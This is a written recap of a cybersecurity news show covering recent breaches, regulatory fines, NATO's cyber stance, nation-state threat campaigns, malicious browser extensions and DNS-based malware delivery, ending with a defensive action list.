Good Morning Security Gang
I hope everyone survived Valentine’s Day, overpaid for flowers, waited in line at packed restaurants, and still called it romance. That’s commitment.
We’ve got a packed show today: 6 million telecom customers exposed in the Netherlands, LVMH luxury brands fined $25 million, NATO finally talking about real cyber consequences for Russia and China, Google tying multiple nation-state actors to active campaigns, 300 malicious Chrome extensions leaking data from 37 million users, and a whole lot more.
Double espresso in hand, coffee cup cheers — let’s get into it.
6 Million Dutch Telecom Customers Exposed
Dutch telecom provider Odido disclosed a breach impacting approximately 6.2 million customers, making it effectively a national-scale cyber incident. Attackers gained unauthorized access to internal systems and exfiltrated customer data including names, contact details, and subscriber-related identifying information. There is no confirmation of financial data exposure at this time, but telecom data carries high downstream value for SIM swapping, account takeover, and targeted social engineering.
Initial indications point toward compromised credentials or insufficiently secured internal access controls rather than a novel zero-day exploit. This underscores a recurring theme: identity misuse is outpacing sophisticated exploit chains. The risk here isn’t immediate chaos — it’s persistent identity-based fraud campaigns that will unfold over months.
Mitigation at scale requires strict privilege access management, session monitoring on administrative consoles, and hardened validation procedures for customer account changes. Telecom providers sit at the heart of identity ecosystems — and attackers know it.
Louis Vuitton, Dior, and Tiffany Fined $25 Million
Luxury brands Louis Vuitton, Dior, and Tiffany, part of the LVMH portfolio, were fined a combined $25 million in South Korea following data breaches attributed to insufficient security controls and weak governance practices. Regulators determined that customer information stored in retail and CRM systems was exposed due to poor data protection measures and compliance failures.
This was not merely a technical shortcoming — it was a governance breakdown. Regulatory fines are increasingly rivaling or exceeding breach response costs, particularly in jurisdictions with strict privacy enforcement.
Multinational enterprises must localize data controls where required and minimize retention strictly to business necessity. A single centralized system serving multiple regulatory environments without segmentation is a liability. When compliance fails, the financial penalty becomes the secondary problem — brand damage is the primary one.
NATO Signals Consequences for Russia and China
At the Munich Security Conference, NATO’s Deputy Secretary General publicly stated the alliance must begin imposing tangible costs on Russia and China for sustained cyber and hybrid operations. The tone has shifted from deterrence language to consequence language.
This follows years of Russian attacks on European infrastructure and Chinese espionage targeting industrial and government sectors. The strategic shift suggests sanctions, trade pressure, and diplomatic retaliation could increasingly be tied directly to cyber campaigns.
"Hello, NATO. Good morning. My name is James Azar. I've been doing this show for, this is episode 1,061 about seven and a half, eight years. Welcome to the party. We've been knocking. You just haven't been answering. Welcome." James Azar
The risk here is escalation — but the alternative has been persistent exploitation without consequence. For multinational organizations, this means preparing for supply chain disruptions, retaliatory cyber activity, and sanction-driven operational impacts. Boards need to be briefed. Geopolitical cyber risk is no longer abstract.
Google Links China, Iran, Russia, and North Korea to Active Campaigns
Google released new research tying actors from China, Iran, Russia, and North Korea to ongoing campaigns targeting defense, aerospace, political entities, semiconductor firms, and critical infrastructure. The campaigns include credential phishing, Android malware deployment, backdoor implantation, and secure messaging exploitation.
Threat clusters such as Sandworm, Lazarus, APT28, APT45, and multiple UNC-designated groups remain highly active. Many operations are focused on Ukraine’s military and drone ecosystem, while others target semiconductor and aerospace supply chains globally.
Let me go through the notable threat actors participating:
Russian-Linked:
APT44 (Sandworm) – Attempting to exfiltrate information from Telegram and Signal in Ukraine
Temp Vermin (UAC-0020) – Using malware like Spectrum, targeting drone production and anti-drone systems
UNC-5125 – Leveraging Android malware called “Great Battle,” a bespoke version of Hydra banking trojan
UNC-579 – Exploiting secure messaging apps targeting Ukrainian military
UNC-4221 – Targeting secure messaging apps used by Ukrainian military personnel
UNC-5976, UNC-609 – Conducting malware delivery operations through WhatsApp
UNC-5114 – Suspected Russian espionage cluster
North Korean-Linked:
APT45 – Targeting South Korean defense, semiconductor, and automotive sectors
APT43 (Kimsuky) – Targeting infrastructure mimicking German and US defense-related entities, deploying backdoor called “ThinWave”
UNC-2970 (Lazarus Group) – Operation Dream Job Campaign targeting aerospace, defense, and energy sectors, relying on AI tools for reconnaissance
Iranian-Linked:
UNC-1549 (Nimbus Manticore) – Targeting aerospace, aviation, and defense industries in the Middle East with malware families Minibike, Two Stroke, Deep Root, and CrashPad
UNC-6446 – Using resume builder and personality test applications to distribute custom malware in aerospace and defense verticals across US and Middle East
Chinese-Linked:
APT5 (Keyhole Panda/Mulberry Typhoon) – Targeting current and former employees of major aerospace and defense contractors
UNC-3236 (Volt Typhoon) – Targeting critical infrastructure
UNC-6508 – Targeting US-based research institutions
"The name and shame campaign that President Obama came up with hasn't stopped anyone from doing it. It's in fact given them glory, they celebrate it on their internal chats. So how do you mitigate this thing? The playbook isn't working." James Azar
These campaigns are not historical retrospectives — they are live operations. Continuous threat hunting focused on identity anomalies and lateral movement is now table stakes. If your organization touches defense, technology, or advanced manufacturing, assume you are being scanned.
Fake Recruiters Sending Malware Through Coding Challenges
Threat actors are posing as recruiters and sending developers “coding challenges” that contain embedded malware. The trust model of professional networking platforms is being weaponized. Developers are downloading and executing malicious repositories under the guise of interview assessments.
The risk is direct compromise of engineering environments and access to proprietary source code repositories. Organizations must sandbox all external code submissions and implement isolated evaluation environments. Recruitment pipelines are now attack surfaces.
300 Malicious Chrome Extensions Impact 37 Million Users
Researchers uncovered more than 300 malicious Chrome extensions collectively impacting approximately 37 million users. The extensions abused browser permissions to exfiltrate browsing activity, session tokens, and potentially authentication data.
Browser-based session hijacking bypasses many traditional endpoint defenses. When the browser becomes the threat vector, the enterprise perimeter dissolves further.
Mitigation requires enforcing enterprise browser extension allowlists. Open installation policies are no longer viable in enterprise environments.
ClickFix Campaign Uses DNS for Payload Retrieval
The ClickFix malware campaign has evolved to retrieve PowerShell payloads using NSLookup and DNS TXT record lookups, blending command-and-control traffic within legitimate DNS queries.
Because DNS traffic is often trusted and under-monitored, attackers can evade traditional detection models. Enabling DNS query logging with anomaly detection for encoded or unusual TXT record patterns is essential.
OpenSea Zero-Day Exploit Chain Identified
Researchers identified an active exploit chain affecting OpenSea infrastructure that could allow unauthorized account access and potential NFT asset theft. In crypto ecosystems, compromise equals irreversible loss.
Mitigation is clear: enforce hardware-based multi-factor authentication for high-value digital asset accounts and minimize hot wallet exposure.
Russian Actor Tied to “CanFailOne” Campaign
Google attributed another active campaign, dubbed “CanFailOne,” to a suspected Russian actor targeting Ukrainian organizations through phishing and malware delivery. Ukraine remains the proving ground for Russia’s cyber operations.
Every technique refined there will migrate elsewhere. Observing Ukraine’s digital battlefield provides insight into what comes next globally.
CheckPoint Announces Strategic Acquisitions
Check Point announced three acquisitions — Sciata, Cyclops, and Rotate — continuing its expansion into AI-driven threat intelligence and cloud security. Under new CEO Nadav Zafrir, the company has accelerated growth and strategic consolidation, reporting $2.7 billion in revenue, up 6% year-over-year.
Cybersecurity consolidation is intensifying as vendors race to integrate AI, automation, and platform-level intelligence capabilities.
Action List
Enforce strict privilege access management for telecom and identity systems
Localize data retention and comply with jurisdictional privacy requirements
Brief boards on geopolitical cyber escalation risk
Deploy continuous identity-based threat hunting
Sandbox all external developer code submissions
Implement enterprise browser extension allowlists
Enable DNS anomaly detection for TXT record abuse
Require hardware MFA for crypto and digital asset accounts
Assess geopolitical exposure across global supply chains
James Azar’s CISO’s Take
Today’s show reinforces a fundamental shift: cyber operations are no longer isolated technical events — they are economic and geopolitical levers. From telecom breaches in the Netherlands to NATO’s evolving stance, the line between cybercrime and statecraft continues to blur.
The second takeaway is trust erosion. Whether it’s browser extensions, recruiter outreach, DNS traffic, or privileged telecom access, attackers are exploiting assumed trust boundaries. In 2026, the perimeter isn’t your firewall — it’s your identity layer and your governance discipline. Organizations that shorten trust windows and increase verification depth will survive this era.
We’ll be back tomorrow at 9 AM Eastern with more. Until then — stay sharp, stay informed, and most importantly, stay cyber safe.
